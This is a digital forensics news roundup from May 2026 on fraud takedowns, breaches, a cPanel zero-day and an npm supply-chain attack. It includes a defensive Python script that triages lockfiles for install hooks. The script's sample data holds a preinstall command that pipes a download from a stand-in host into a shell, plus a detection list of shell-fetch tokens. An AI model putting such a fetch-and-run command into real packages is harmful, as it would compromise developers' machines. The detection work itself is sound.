Friday, May 1 2026
DFM News Roundup
Digital Forensics Magazine — 48h News Roundup
Window: 2026-04-29 00:00 to 2026-05-01 00:00 (UTC)

Snapshot Summary

Sector / Section | Headline Highlights | Count
Digital Investigations | Fraud call centres, Signal phishing | 2
Cyber Investigations | Contractor breach, county leak | 2
Major Cyber Incidents | Itron intrusion, Medtronic attack | 2
Exploits & Threat Intelligence | cPanel zero-day, SAP npm | 2
Law Enforcement | Europol arrests, Terrorgram sentence | 2
Policy & Standards | UK survey, agentic AI guidance | 2

Digital Investigations

Europol said Austrian and Albanian authorities dismantled call centres linked to a EUR 50 million online fraud case, with searches and seizures across Europe [EMEA]. The case matters for investigators because seized cash and IT infrastructure can connect victim reports, payment trails, operator accounts and communications evidence across jurisdictions (Source: Europol, 30-04-2026).

German authorities suspect Russia-linked operators used Signal phishing against senior officials, military personnel and journalists, with reporting describing about 300 affected accounts [EMEA]. Investigators should prioritise chat-token artefacts, device-linking events, phishing bot infrastructure and cross-platform account recovery logs to preserve attribution signals and assess message exposure (Source: AP, 28-04-2026).

Cyber Investigations

Singapore media reported that Shanghai Tunnel Engineering Co Singapore suffered a cybersecurity incident affecting data tied to Jurong Region Line stations and the Changi NEWater Factory 3 project [APAC]. The investigation requires correlation between contractor systems, project repositories, access-control records and client-side notifications to identify compromised datasets and downstream infrastructure exposure (Source: The Straits Times, 28-04-2026).

Winona County officials said data stolen during an earlier ransomware attack was released by the criminals, escalating the incident from service disruption to confirmed data exposure [AMER]. Investigators now need to compare leak-site material with internal file inventories, preserve ransom communications and document notification evidence for affected residents and county systems (Source: GovTech, 30-04-2026).

Major Cyber Incidents

Itron disclosed that attackers accessed internal IT systems, with the utility technology supplier saying it detected the April intrusion and blocked further malicious activity [AMER]. The filing is significant because forensic review must verify segmentation between corporate systems, customer platforms and operational technology dependencies used by utilities in more than 100 countries (Source: TechRadar, 28-04-2026).

Medtronic confirmed a cyberattack on its corporate IT network and said manufacturing, distribution, product safety and patient services were not disrupted [AMER]. Investigators should validate that separation through network telemetry, identity logs and endpoint evidence, especially where medical-device supply chains depend on trusted corporate services for support and logistics (Source: Reuters, 28-04-2026).

Exploits & Threat Intelligence

ASD’s ACSC warned that CVE-2026-41940 in cPanel and WHM is being actively exploited in Australia, enabling authentication bypass and potential remote code execution [APAC]. The advisory gives investigators immediate triage points: exposed control-panel interfaces, patch status after 30 April, web access logs and any post-authentication artefacts created by unauthorised sessions (Source: ASD ACSC, 01-05-2026).

Dark Reading reported that TeamPCP compromised npm packages used in SAP cloud application development, injecting malicious preinstall scripts into the software supply chain [GLOBAL]. The campaign matters because package-lock files, developer workstation telemetry, CI pipeline logs and registry-download records may be the strongest evidence for tracing exposure and secondary credential theft (Source: Dark Reading, 30-04-2026).
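As an added illustration of the evidence triage described above (this is example code written for this roundup, not code from Dark Reading, SAP or the TeamPCP reporting), the script below cross-checks a v2/v3 package-lock.json against the package.json manifests actually present under node_modules. It reports every dependency that declares an npm lifecycle hook, flags hook commands containing tokens an analyst would want to read first, and marks entries whose tarball resolved from somewhere other than the expected registry or whose lockfile hasInstallScript flag disagrees with the installed manifest. The package names, versions, URLs and hook commands are constructed sample data; the trusted registry prefix and the indicator token list are assumptions to adjust for your environment.

```python
import json
from typing import Dict, List

# npm runs these hooks automatically during "npm install"; a malicious
# preinstall script executes before any of the package's own code is imported.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed heuristics: substrings in a hook command that merit analyst review.
SUSPICIOUS_TOKENS = ("curl ", "wget ", "node -e", "base64", "| sh", "| bash", "eval(", "/dev/tcp")

# Assumption: tarballs are expected to resolve from the public npm registry only.
TRUSTED_REGISTRY_PREFIXES = ("https://registry.npmjs.org/",)


def triage_lockfile(lockfile: dict, manifests: Dict[str, dict]) -> List[dict]:
    """Cross-check a v2/v3 package-lock.json against installed package.json files.

    `manifests` maps the node_modules path used as a key in the lockfile
    (for example "node_modules/pkg-c") to that package's package.json contents.
    Returns one finding per package that declares a lifecycle hook, resolved
    off-registry, or whose lockfile entry disagrees with what is installed.
    """
    findings = []
    for path, entry in lockfile.get("packages", {}).items():
        if path == "":
            continue  # the empty key is the root project itself
        manifest = manifests.get(path, {})
        scripts = manifest.get("scripts", {})
        hooks = {h: scripts[h] for h in LIFECYCLE_HOOKS if h in scripts}
        resolved = entry.get("resolved", "")
        off_registry = bool(resolved) and not resolved.startswith(TRUSTED_REGISTRY_PREFIXES)
        # Lockfile v2+ records hasInstallScript when the published manifest declared
        # install hooks; a mismatch means the installed tree is not what the lock
        # was generated from (tampered tree, or a republished version).
        lock_flag = bool(entry.get("hasInstallScript", False))
        mismatch = lock_flag != bool(hooks)
        if not hooks and not mismatch and not off_registry:
            continue
        indicators = sorted({tok for cmd in hooks.values() for tok in SUSPICIOUS_TOKENS if tok in cmd})
        findings.append({
            "package": path.rsplit("node_modules/", 1)[-1],
            "version": entry.get("version"),
            "resolved": resolved,
            "hooks": hooks,
            "indicators": indicators,
            "lock_mismatch": mismatch,
            "off_registry": off_registry,
            "severity": "high" if (indicators or off_registry or mismatch) else "review",
        })
    return findings


# Constructed sample data standing in for a real lockfile and installed tree.
SAMPLE_LOCKFILE = {
    "name": "sample-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "sample-app", "version": "1.0.0"},
        "node_modules/pkg-a": {"version": "2.1.0",
                               "resolved": "https://registry.npmjs.org/pkg-a/-/pkg-a-2.1.0.tgz"},
        "node_modules/pkg-b": {"version": "0.9.4",
                               "resolved": "https://registry.npmjs.org/pkg-b/-/pkg-b-0.9.4.tgz",
                               "hasInstallScript": True},
        "node_modules/pkg-c": {"version": "1.3.7",
                               "resolved": "https://mirror.example.invalid/pkg-c-1.3.7.tgz"},
    },
}
SAMPLE_MANIFESTS = {
    "node_modules/pkg-a": {"name": "pkg-a", "version": "2.1.0", "scripts": {"test": "node test.js"}},
    "node_modules/pkg-b": {"name": "pkg-b", "version": "0.9.4", "scripts": {"postinstall": "node install.js"}},
    "node_modules/pkg-c": {"name": "pkg-c", "version": "1.3.7",
                           "scripts": {"preinstall": "curl -s https://mirror.example.invalid/s | sh"}},
}

if __name__ == "__main__":
    # On a real case, load package-lock.json and walk node_modules/*/package.json instead.
    print(json.dumps(triage_lockfile(SAMPLE_LOCKFILE, SAMPLE_MANIFESTS), indent=2))
```

Run against the constructed data, pkg-a produces no finding, pkg-b is reported as "review" because it declares a postinstall hook that the lockfile also knows about, and pkg-c is "high": its preinstall pipes a download into a shell, the tarball resolved off-registry, and the lockfile never recorded an install script for it. The lockfile and manifests are worth preserving as evidence alongside CI logs and registry-download records before any reinstall rewrites them.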

Law Enforcement

Europol said Swiss authorities arrested 10 people in action against the Black Axe criminal organisation, including a suspected senior figure, after searches across several cantons [EMEA]. The operation gives investigators fresh opportunities to correlate seized devices, financial ledgers, messaging accounts and victim complaints tied to transnational fraud and organised cyber-enabled crime (Source: Europol, 29-04-2026).

Europol reported that a Danish-French Terrorgram network member was sentenced in Denmark to six years for terrorism-related offences following international cooperation [EMEA]. Digital investigators can use the case as a reminder that extremist-network prosecutions often turn on platform attribution, device ownership, content preservation, translation integrity and chain-of-custody handling (Source: Europol, 01-05-2026).

Policy & Standards

The UK government published its Cyber Security Breaches Survey 2025/2026, reporting persistent breach and attack exposure among businesses, charities and education institutions [EMEA]. For investigation leaders, the findings support readiness benchmarks around logging, vulnerability assessment, reporting routes and evidence capture before incidents become regulatory or insurance disputes (Source: GOV.UK, 30-04-2026).

ASD’s ACSC published new joint guidance on careful adoption of agentic AI services, warning that autonomous tools introduce security and resilience risks [APAC]. Investigation teams should convert the guidance into evidential requirements for agent actions, prompt histories, delegated credentials, audit logs and human approval records when AI systems affect business decisions (Source: ASD ACSC, 01-05-2026).

Editorial Perspective

This cycle shows how digital investigations are increasingly spread across contractor platforms, messaging apps, cloud development pipelines and regulated infrastructure suppliers. Evidence preservation now depends on early collection of identity events, endpoint records, package provenance, leak-site material and communications metadata. Investigators should treat third-party systems as primary evidence locations, not secondary context.

The strongest attribution opportunities appear where multiple artefact classes can be correlated: phishing infrastructure with linked-device events, package registry data with build logs, and law-enforcement seizures with victim-side reports. Organisations should pre-map who can preserve logs, export audit trails and verify chain of custody across outsourced environments. Readiness is becoming a contractual and technical evidence problem as much as a security control problem.

Tags

Digital Investigations, Evidence Preservation, cPanel, CVE-2026-41940, Supply Chain Security, SAP npm, Signal Phishing, Agentic AI, Ransomware, Europol, Contractor Risk, Audit Logs
